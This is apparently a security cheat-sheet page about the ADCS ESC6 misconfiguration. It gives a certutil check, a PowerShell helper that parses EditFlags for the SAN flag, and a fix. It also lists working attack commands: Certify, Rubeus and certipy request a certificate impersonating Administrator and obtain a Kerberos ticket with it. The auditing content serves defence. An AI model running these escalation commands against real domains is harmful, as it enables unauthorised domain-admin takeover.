ESC6
ESC6 permits a requester to include user-defined values in the subject
alternative name (SAN) of any certificate request.
Verify the setting by reading the CA's policy EditFlags:
PS /home/bobbuilder> certutil -config "CA_HOST\CA_NAME" -getreg "policy\EditFlags"
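For auditing, the EditFlags value printed by the command above can be checked for the EDITF_ATTRIBUTESUBJECTALTNAME2 bit (0x00040000), the flag that lets a request carry its own SAN. The following is an added example, not part of the original page: Test-Esc6EditFlags is a hypothetical helper name, and the sample certutil output and the CA name EXAMPLE-CA are constructed.

```powershell
# Added example: decide from certutil output whether a CA accepts
# requester-supplied SANs. Helper name and sample data are assumptions.
function Test-Esc6EditFlags {
    param(
        [Parameter(Mandatory)][string[]]$CertutilOutput,
        [string]$CaConfig = '(unknown)'
    )
    # EDITF_ATTRIBUTESUBJECTALTNAME2: SAN may be taken from request attributes
    $sanFlag = [uint32]0x00040000

    # certutil prints the value as "EditFlags REG_DWORD = <hex> (<decimal>)"
    $text = $CertutilOutput -join "`n"
    $m = [regex]::Match($text, 'EditFlags\s+REG_DWORD\s*=\s*([0-9a-fA-F]+)')
    if (-not $m.Success) {
        throw "No 'EditFlags REG_DWORD' line found; check the -config string and access rights."
    }
    $flags = [Convert]::ToUInt32($m.Groups[1].Value, 16)

    [pscustomobject]@{
        CA                  = $CaConfig
        EditFlags           = '0x{0:X8}' -f $flags
        SanFromRequestAllowed = (($flags -band $sanFlag) -ne 0)
    }
}

# Constructed sample of certutil -getreg output (not captured from a real CA)
$sample = @'
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\EXAMPLE-CA\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy\EditFlags:

  EditFlags REG_DWORD = 15014e (1376590)
'@ -split "`r?`n"

Test-Esc6EditFlags -CertutilOutput $sample -CaConfig 'CA_HOST\EXAMPLE-CA'

# Against a live CA, feed the command from this page straight in:
# Test-Esc6EditFlags (certutil -config "CA_HOST\CA_NAME" -getreg "policy\EditFlags") 'CA_HOST\CA_NAME'
```

If the flag is set and not required, running `certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2` on the CA clears it. The change takes effect after the CertSvc service is restarted.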
Windows
Request a certificate abusing ESC6
PS /home/bobbuilder> .\Certify.exe request /ca:<ca_name> /template:<template_name> /altname:Administrator
Convert certificate to PFX
Get a TGT as the Administrator account
PS /home/bobbuilder> .\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx
Linux
Request a certificate with an alternative UPN
bob$ certipy req -username user1@minions.com -password password1 -ca <ca_name> -target <ip> -template <template_name> -upn administrator@minions.com